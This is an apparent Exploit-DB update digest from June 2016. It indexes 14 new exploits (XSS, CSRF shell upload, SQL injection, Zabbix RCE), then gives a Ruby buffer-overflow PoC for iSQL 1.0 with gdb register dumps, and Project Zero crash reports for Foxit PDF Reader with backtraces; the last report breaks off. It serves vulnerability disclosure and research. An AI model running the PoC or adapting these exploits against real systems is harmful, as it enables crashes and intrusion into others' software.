DB: 2016-06-14

14 new exploits

FRticket Ticket System - Stored XSS
Viart Shopping Cart 5.0 - CSRF Shell Upload
Easy RM to MP3 Converter 2.7.3.700 - (.m3u) Exploit with Universal DEP+ASLR Bypass
Dream Gallery 2.0 - Admin Panel Authentication Bypass
Grid Gallery 1.0 - Admin Panel Authentication Bypass
Joomla PayPlans (com_payplans) Extension 3.3.6 - SQL Injection
Zabbix 2.2 - 3.0.3 - RCE with API JSON-RPC
iSQL 1.0 - Shell Command Injection
iSQL 1.0 - isql_main.c Buffer Overflow PoC
Foxit PDF Reader 1.0.1.0925 - CPDF_StreamContentParser::~CPDF_StreamContentParser Heap-Based Memory Corruption
Foxit PDF Reader 1.0.1.0925 - CPDF_DIBSource::TranslateScanline24bpp Out-of-Bounds Read
Foxit PDF Reader 1.0.1.0925 - CFX_WideString::operator= Invalid Read
Foxit PDF Reader 1.0.1.0925 -kdu_core::kdu_codestream::get_subsampling Memory Corruption
Foxit PDF Reader 1.0.1.0925 - CFX_BaseSegmentedArray::IterateIndex Memory Corruption

files.csv

@@ -36109,3 +36109,17 @@ id,file,description,date,author,platform,type,port
 39928,platforms/osx/dos/39928.c,"OS X Kernel - Use-After-Free Due to Bad Locking in IOAcceleratorFamily2",2016-06-10,"Google Security Research",osx,dos,0
 39929,platforms/multiple/dos/39929.c,"OS X/iOS Kernel - UAF Racing getProperty on IOHDIXController and testNetBootMethod on IOHDIXControllerUserClient",2016-06-10,"Google Security Research",multiple,dos,0
 39930,platforms/osx/dos/39930.c,"OS X Kernel - Stack Buffer Overflow in GeForce GPU Driver",2016-06-10,"Google Security Research",osx,dos,0
+39931,platforms/php/webapps/39931.txt,"FRticket Ticket System - Stored XSS",2016-06-13,"Hamit Abis",php,webapps,80
+39932,platforms/php/webapps/39932.html,"Viart Shopping Cart 5.0 - CSRF Shell Upload",2016-06-13,"Ali Ghanbari",php,webapps,80
+39933,platforms/windows/local/39933.py,"Easy RM to MP3 Converter 2.7.3.700 - (.m3u) Exploit with Universal DEP+ASLR Bypass",2016-06-13,"Fitzl Csaba",windows,local,0
+39934,platforms/php/webapps/39934.txt,"Dream Gallery 2.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80
+39935,platforms/php/webapps/39935.txt,"Grid Gallery 1.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80
+39936,platforms/php/webapps/39936.txt,"Joomla PayPlans (com_payplans) Extension 3.3.6 - SQL Injection",2016-06-13,"Persian Hack Team",php,webapps,80
+39937,platforms/php/webapps/39937.py,"Zabbix 2.2 - 3.0.3 - RCE with API JSON-RPC",2016-06-13,"Alexander Gurin",php,webapps,80
+39938,platforms/linux/local/39938.rb,"iSQL 1.0 - Shell Command Injection",2016-06-13,HaHwul,linux,local,0
+39939,platforms/linux/dos/39939.rb,"iSQL 1.0 - isql_main.c Buffer Overflow PoC",2016-06-13,HaHwul,linux,dos,0
+39940,platforms/linux/dos/39940.txt,"Foxit PDF Reader 1.0.1.0925 - CPDF_StreamContentParser::~CPDF_StreamContentParser Heap-Based Memory Corruption",2016-06-13,"Google Security Research",linux,dos,0
+39941,platforms/linux/dos/39941.txt,"Foxit PDF Reader 1.0.1.0925 - CPDF_DIBSource::TranslateScanline24bpp Out-of-Bounds Read",2016-06-13,"Google Security Research",linux,dos,0
+39942,platforms/linux/dos/39942.txt,"Foxit PDF Reader 1.0.1.0925 - CFX_WideString::operator= Invalid Read",2016-06-13,"Google Security Research",linux,dos,0
+39943,platforms/linux/dos/39943.txt,"Foxit PDF Reader 1.0.1.0925 -kdu_core::kdu_codestream::get_subsampling Memory Corruption",2016-06-13,"Google Security Research",linux,dos,0
+39944,platforms/linux/dos/39944.txt,"Foxit PDF Reader 1.0.1.0925 - CFX_BaseSegmentedArray::IterateIndex Memory Corruption",2016-06-13,"Google Security Research",linux,dos,0

platforms/linux/dos/39939.rb

@@ -0,0 +1,64 @@
+#!/bin/ruby
+# Exploit Title: iSQL(RL) 1.0 - Buffer Overflow(isql_main.c)
+# Date: 2016-06-13
+# Exploit Author: HaHwul
+# Exploit Author Blog: www.hahwul.com
+# Vendor Homepage: https://github.com/roselone/iSQL
+# Software Link: https://github.com/roselone/iSQL/archive/master.zip
+# Version: 1.0
+# Tested on: Debian [wheezy]
+# CVE : none
+=begin
+### Vulnerability Point
+ :: [isql_main.c 453 line] strcpy((char *)cmd+5,str); code is vulnerable
+ :: don't check str size
+446 char *get_MD5(char *str){
+447         FILE *stream;
+448         char *buf=malloc(sizeof(char)*33);
+449         char cmd[100];
+450         memset(buf,'\0',sizeof(buf));
+451         memset(cmd,'\0',sizeof(cmd));
+452         strcpy(cmd,"echo "); //5
+453         strcpy((char *)cmd+5,str);
+
+Edit makefile > CFLAGS = -fno-stack-protector
+#> make
+
+### gdb history
+(gdb) r
+Starting program: /home/noon/Noon/LAB/exploit/vuln_test/iSQL/isql
+
+*************** welcome to ISQL ****************
+* version 1.0                                  *
+* Designed by RL                               *
+* Copyright (c) 2011, RL. All rights reserved  *
+************************************************
+
+>username: hwul_test
+>password: AAAAAAAAAAAAAAAAAAAAAAAAAA...  ("A" * 800)
+Program received signal SIGSEGV, Segmentation fault.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0x000000000040644c in get_MD5 ()
+
+(gdb) x/s $rax
+0x4141414141414141:     <error: Cannot access memory at address 0x4141414141414141>
+
+(gdb) x/s $rbp
+0x4141414141414141:     <error: Cannot access memory at address 0x4141414141414141>
+
+### Registers
+(gdb) i r
+rax            0x4141414141414141       4702111234474983745
+rbx            0x0      0
+rcx            0x7ffff7b06480   140737348920448
+rdx            0x0      0
+rsi            0x60b610 6338064
+rdi            0x5      5
+rbp            0x4141414141414141       0x4141414141414141
+rsp            0x7fffffffe948   0x7fffffffe948
+r8             0xffffffff       4294967295
+r9             0x0    
+=end
+puts "iSQL 1.0 - Buffer Overflow"
+puts " - by hahwul"
+puts " - Run BUG.."
+buffer = "A"*800 
+system("(sleep 5; echo -en 'hwul\n';sleep 1;echo -en 'asdf;#{buffer};echo 1';sleep 10) | ./isql")

platforms/linux/dos/39940.txt

@@ -0,0 +1,105 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=741
+
+We have identified the following memory corruption vulnerability in Foxit PDF Reader (version 1.0.1.0925 for Linux 64-bit), when started with a specially crafted PDF file in the following way:
+
+$ MALLOC_CHECK_=3 DISPLAY=:1 FoxitReader /path/to/poc/file.pdf
+
+The MALLOC_CHECK_=3 environment variable is used to enforce strict checks in the libc memory allocator, while DISPLAY=:1 is set due to the fact that we are testing the application with a virtual X server (Xvfb), but the issue should be equally reproducible with the program started with standard display settings, too.
+
+An example excerpt from the crash log is as follows:
+
+--- cut ---
+*** Error in `FoxitReader': free(): invalid pointer: 0x0000000001930a60 ***
+[New Thread 0x7fffdfa16700 (LWP 26721)]
+[New Thread 0x7fffe0217700 (LWP 26720)]
+[New Thread 0x7fffe0a18700 (LWP 26718)]
+[New Thread 0x7fffe97cd700 (LWP 26717)]
+
+Program received signal SIGABRT, Aborted.
+0x00007ffff4fc0cb7 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
+56      ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
+(gdb) where
+#0  0x00007ffff4fc0cb7 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
+#1  0x00007ffff4fc40a8 in __GI_abort () at abort.c:89
+#2  0x00007ffff4ffd2f4 in __libc_message (do_abort=do_abort@entry=1, 
+    fmt=fmt@entry=0x7ffff510b988 "*** Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:175
+#3  0x00007ffff500bef6 in malloc_printerr (ptr=<optimized out>, 
+    str=0x7ffff5107a79 "free(): invalid pointer", action=1) at malloc.c:4996
+#4  free_check (mem=<optimized out>, caller=<optimized out>) at hooks.c:298
+#5  0x00000000007c823f in CPDF_StreamContentParser::~CPDF_StreamContentParser() ()
+#6  0x00000000007c9504 in CPDF_ContentParser::Continue(IFX_Pause*, int) ()
+#7  0x00000000007b97d9 in CPDF_PageObjects::ContinueParse(IFX_Pause*) ()
+#8  0x000000000047a8b4 in CReader_PageEx::ParsePage (this=0x191f7e0)
+    at ../../Readerlite/ReaderLite/src/frd_pageex.cpp:792
+#9  0x0000000000490415 in CPDFViewerContentProvider::ParsePage (this=0x191ea60, nPage=0)
+    at ../../Readerlite/ReaderLite/src/pdfviewercontentprovider.cpp:23
+#10 0x000000000061da5f in CPDFViewerEx::DrawPages(CFX_DIBitmap*) ()
+#11 0x000000000061daa8 in CPDFViewerEx::Paint(CFX_DIBitmap*) ()
+#12 0x000000000061daf1 in CPDFViewerEx::ContinueRendering() ()
+#13 0x000000000061de17 in CPDFViewerEx::GetRenderData(int) ()
+#14 0x000000000044b274 in CPDF_TVPreview::paintEvent (this=0x191efe0)
+    at ../../Readerlite/ReaderLite/src/preview.cpp:1305
+#15 0x00007ffff74c2302 in QWidget::event(QEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#16 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#17 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#18 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
+#19 0x00007ffff74bcbea in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#20 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#21 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#22 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#23 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#24 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#25 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#26 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#27 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#28 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#29 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#30 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#31 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#32 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+---Type <return> to continue, or q <return> to quit---
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#33 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#34 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#35 0x00007ffff7493233 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#36 0x00007ffff7493941 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#37 0x00007ffff74e0973 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#38 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#39 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#40 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
+#41 0x00007ffff6860ea6 in QGuiApplicationPrivate::processExposeEvent(QWindowSystemInterfacePrivate::ExposeEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
+#42 0x00007ffff6861995 in QGuiApplicationPrivate::processWindowSystemEvent(QWindowSystemInterfacePrivate::WindowSystemEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
+#43 0x00007ffff684a858 in QWindowSystemInterface::sendWindowSystemEvents(QFlags<QEventLoop::ProcessEventsFlag>) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
+#44 0x00007fffecc415b0 in ?? () from /usr/lib/x86_64-linux-gnu/qt5/plugins/platforms/libqxcb.so
+#45 0x00007ffff4a79e04 in g_main_context_dispatch () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
+#46 0x00007ffff4a7a048 in ?? () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
+#47 0x00007ffff4a7a0ec in g_main_context_iteration () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
+#48 0x00007ffff638d98c in QEventDispatcherGlib::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
+#49 0x00007ffff633f96b in QEventLoop::exec(QFlags<QEventLoop::ProcessEventsFlag>) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
+#50 0x00007ffff63460e1 in QCoreApplication::exec() () from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
+#51 0x0000000000439e25 in main (argc=2, argv=0x7fffffffe288) at ../../Readerlite/ReaderLite/src/main.cpp:310
+--- cut ---
+
+Attached are six proof of concept PDF files: three derived from an original file named 172.pdf in our original corpus, and three derived from 5659.pdf. While the two groups of files generate crashes with slightly different stack traces, the overall symptoms are similar enough to assume they expose the same bug in the code.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39940.zip
+

platforms/linux/dos/39941.txt

@@ -0,0 +1,113 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=744
+
+We have identified the following crash due to an out-of-bounds read in Foxit PDF Reader (version 1.0.1.0925 for Linux 64-bit), when started with a specially crafted PDF file in the following way:
+
+$ MALLOC_CHECK_=3 DISPLAY=:1 FoxitReader /path/to/poc/file.pdf
+
+The MALLOC_CHECK_=3 environment variable is used to enforce strict checks in the libc memory allocator, while DISPLAY=:1 is set due to the fact that we are testing the application with a virtual X server (Xvfb), but the issue should be equally reproducible with the program started with standard display settings, too.
+
+An example excerpt from the crash log is as follows:
+
+--- cut ---
+Program received signal SIGSEGV, Segmentation fault.
+0x00000000007fb462 in CPDF_DIBSource::TranslateScanline24bpp(unsigned char*, unsigned char const*) const ()
+(gdb) where
+#0  0x00000000007fb462 in CPDF_DIBSource::TranslateScanline24bpp(unsigned char*, unsigned char const*) const
+    ()
+#1  0x00000000007fbd6c in CPDF_DIBSource::GetScanline(int) const ()
+#2  0x000000000084b849 in CFX_DIBSource::Clone(FX_RECT const*) const ()
+#3  0x00000000007f2e71 in CPDF_ImageCache::ContinueGetCachedBitmap() ()
+#4  0x00000000007f2f9e in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
+#5  0x00000000007f3ba0 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
+#6  0x00000000007fb00d in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
+#7  0x00000000007fb13b in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
+#8  0x00000000007f42ff in CPDF_ImageRenderer::StartLoadDIBSource() ()
+#9  0x00000000007f6782 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) ()
+#10 0x00000000007f1689 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) ()
+#11 0x00000000007f237a in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) ()
+#12 0x000000000061d75d in CPDFViewerPageEx::Rendering(CFX_DIBitmap*, int, int, int, int, int, CPDF_RenderOptions*) ()
+#13 0x000000000061d9cb in CPDFViewerPageEx::DrawPageContent(CFX_DIBitmap*, CFX_ViewRect&) ()
+#14 0x000000000061da6a in CPDFViewerEx::DrawPages(CFX_DIBitmap*) ()
+#15 0x000000000061daa8 in CPDFViewerEx::Paint(CFX_DIBitmap*) ()
+#16 0x000000000061daf1 in CPDFViewerEx::ContinueRendering() ()
+#17 0x000000000061de17 in CPDFViewerEx::GetRenderData(int) ()
+#18 0x000000000044b274 in CPDF_TVPreview::paintEvent (this=0x191fca0)
+    at ../../Readerlite/ReaderLite/src/preview.cpp:1305
+#19 0x00007ffff74c2302 in QWidget::event(QEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#20 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#21 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#22 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
+#23 0x00007ffff74bcbea in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#24 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#25 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#26 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#27 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#28 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#29 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#30 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#31 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#32 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#33 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+---Type <return> to continue, or q <return> to quit---     
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#34 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#35 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#36 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#37 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#38 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#39 0x00007ffff7493233 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#40 0x00007ffff7493941 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#41 0x00007ffff74e0973 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#42 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#43 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#44 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
+#45 0x00007ffff6860ea6 in QGuiApplicationPrivate::processExposeEvent(QWindowSystemInterfacePrivate::ExposeEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
+#46 0x00007ffff6861995 in QGuiApplicationPrivate::processWindowSystemEvent(QWindowSystemInterfacePrivate::WindowSystemEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
+#47 0x00007ffff684a858 in QWindowSystemInterface::sendWindowSystemEvents(QFlags<QEventLoop::ProcessEventsFlag>) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
+#48 0x00007fffecc415b0 in ?? () from /usr/lib/x86_64-linux-gnu/qt5/plugins/platforms/libqxcb.so
+#49 0x00007ffff4a79e04 in g_main_context_dispatch () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
+#50 0x00007ffff4a7a048 in ?? () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
+#51 0x00007ffff4a7a0ec in g_main_context_iteration () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
+#52 0x00007ffff638d98c in QEventDispatcherGlib::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
+#53 0x00007ffff633f96b in QEventLoop::exec(QFlags<QEventLoop::ProcessEventsFlag>) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
+#54 0x00007ffff63460e1 in QCoreApplication::exec() () from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
+#55 0x0000000000439e25 in main (argc=2, argv=0x7fffffffe288) at ../../Readerlite/ReaderLite/src/main.cpp:310
+(gdb) x/10i $rip
+=> 0x7fb462 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+188>:   mov    0x2(%rbp),%dl
+   0x7fb465 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+191>:   add    $0x3,%r13
+   0x7fb469 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+195>:   add    $0x3,%rbp
+   0x7fb46d <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+199>:   inc    %eax
+   0x7fb46f <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+201>:   mov    %dl,-0x3(%r13)
+   0x7fb473 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+205>:   mov    -0x2(%rbp),%dl
+   0x7fb476 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+208>:   mov    %dl,-0x2(%r13)
+   0x7fb47a <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+212>:   mov    -0x3(%rbp),%dl
+   0x7fb47d <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+215>:   mov    %dl,-0x1(%r13)
+   0x7fb481 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+219>:
+    jmp    0x7fb459 <_ZNK14CPDF_DIBSource22TranslateScanline24bppEPhPKh+179>
+(gdb) info reg $rbp
+rbp            0x1a30fff        0x1a30fff
+--- cut ---
+
+Attached is a proof of concept PDF file.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39941.zip
+

platforms/linux/dos/39942.txt

@@ -0,0 +1,119 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=745
+
+We have identified the following crash due to an invalid read in Foxit PDF Reader (version 1.0.1.0925 for Linux 64-bit), when started with a specially crafted PDF file in the following way:
+
+$ DISPLAY=:1 FoxitReader /path/to/poc/file.pdf
+
+The DISPLAY=:1 environment variable is set due to the fact that we are testing the application with a virtual X server (Xvfb), but the issue should be equally reproducible with the program started with standard display settings, too.
+
+An example excerpt from the crash log is as follows:
+
+--- cut ---
+Program received signal SIGSEGV, Segmentation fault.
+0x0000000000ab467f in CFX_WideString::operator=(CFX_WideString const&) ()
+(gdb) where
+#0  0x0000000000ab467f in CFX_WideString::operator=(CFX_WideString const&) ()
+#1  0x00000000006c53a8 in CRichTextXML::ParseXML2Text(CXML_Element*, CRichTextXML::STYLE*, CRichTextXML::STYLE*) ()
+#2  0x00000000006c5357 in CRichTextXML::ParseXML2Text(CXML_Element*, CRichTextXML::STYLE*, CRichTextXML::STYLE*) ()
+#3  0x00000000006c5357 in CRichTextXML::ParseXML2Text(CXML_Element*, CRichTextXML::STYLE*, CRichTextXML::STYLE*) ()
+#4  0x00000000006c6364 in CRichTextXML::ParseXML2Text() ()
+#5  0x00000000006c6a33 in CRichTextXML::SetXML(wchar_t const*, wchar_t const*) ()
